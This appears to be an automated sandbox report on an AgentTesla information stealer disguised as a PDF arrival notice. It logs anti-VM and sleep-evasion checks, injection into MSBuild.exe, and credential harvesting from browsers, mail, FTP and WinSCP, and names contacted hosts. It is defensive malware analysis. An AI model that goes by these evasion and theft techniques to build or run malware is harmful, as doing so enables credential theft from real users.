                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFunction Chain: systemQueried,systemQueried,threadDelayed,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWindow / User API: threadDelayed 557
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -3270000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -149450s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -269019s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -89721s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -328966s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -686757s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -298600s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -59718s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -150000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -60048s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -30141s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -40062s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -38844s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -59686s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -39562s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 1724Thread sleep time: -39312s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeLast function: Thread delayed
                Source: MSBuild.exe, 00000003.00000002.481167503.0000000005D10000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: MSBuild.exe, 00000003.00000002.482772481.00000000078D0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
                Source: MSBuild.exe, 00000003.00000002.481167503.0000000005D10000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: MSBuild.exe, 00000003.00000002.481167503.0000000005D10000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: MSBuild.exe, 00000003.00000002.481167503.0000000005D10000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0558B078 LdrInitializeThunk,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000C215C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000C215C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000C215C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000B1970 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000B1970 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000D1CC2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000D2688 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000D26C5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000D2728 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000BA5B8 GetProcessHeap,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000BF458 SetUnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000BF47B SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Maps a DLL or memory area into another processShow sources
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe protection: execute and read and write
                Writes to foreign memory regionsShow sources
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: E35008
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                Source: MSBuild.exe, 00000003.00000002.476151015.0000000001AD0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: MSBuild.exe, 00000003.00000002.476151015.0000000001AD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: MSBuild.exe, 00000003.00000002.476151015.0000000001AD0000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: MSBuild.exe, 00000003.00000002.476151015.0000000001AD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000B9D61 cpuid
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: EnumSystemLocalesEx,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: GetLocaleInfoEx,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: GetLocaleInfoEx,__wcsnicmp,_TestDefaultCountry,_TestDefaultCountry,__invoke_watson,__invoke_watson,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000BBDE2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Arrivalnotice2020pdf.exe PID: 5492, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2540, type: MEMORY
                Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Arrivalnotice2020pdf.exe.b0000.0.unpack, type: UNPACKEDPE
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: Yara matchFile source: 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2540, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Arrivalnotice2020pdf.exe PID: 5492, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2540, type: MEMORY
                Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Arrivalnotice2020pdf.exe.b0000.0.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation211DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools11OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API11Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information11Input Capture11System Information Discovery135Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Process Injection212Obfuscated Files or Information2Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSSecurity Software Discovery141Distributed Component Object ModelInput Capture11Scheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsVirtualization/Sandbox Evasion13SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion13Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection212Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Network Configuration Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                Behavior Graph

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Arrivalnotice2020pdf.exe23%VirustotalBrowse
                Arrivalnotice2020pdf.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                3.2.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                https://dBHeYNWtul3f.net0%Avira URL Cloudsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://api.ipify.orgx&0%Avira URL Cloudsafe
                http://ZLVZGU.com0%Avira URL Cloudsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                elb097307-934924932.us-east-1.elb.amazonaws.com
                174.129.214.20
                truefalse
                  high
                  webmail.hapkidocollege.com.au
                  103.9.171.52
                  truetrue
                    unknown
                    api.ipify.org
                    unknown
                    unknownfalse
                      high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpfalse
                        high
                        http://127.0.0.1:HTTP/1.1MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://api.ipify.orgMSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpfalse
                          high
                          http://DynDns.comDynDNSMSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
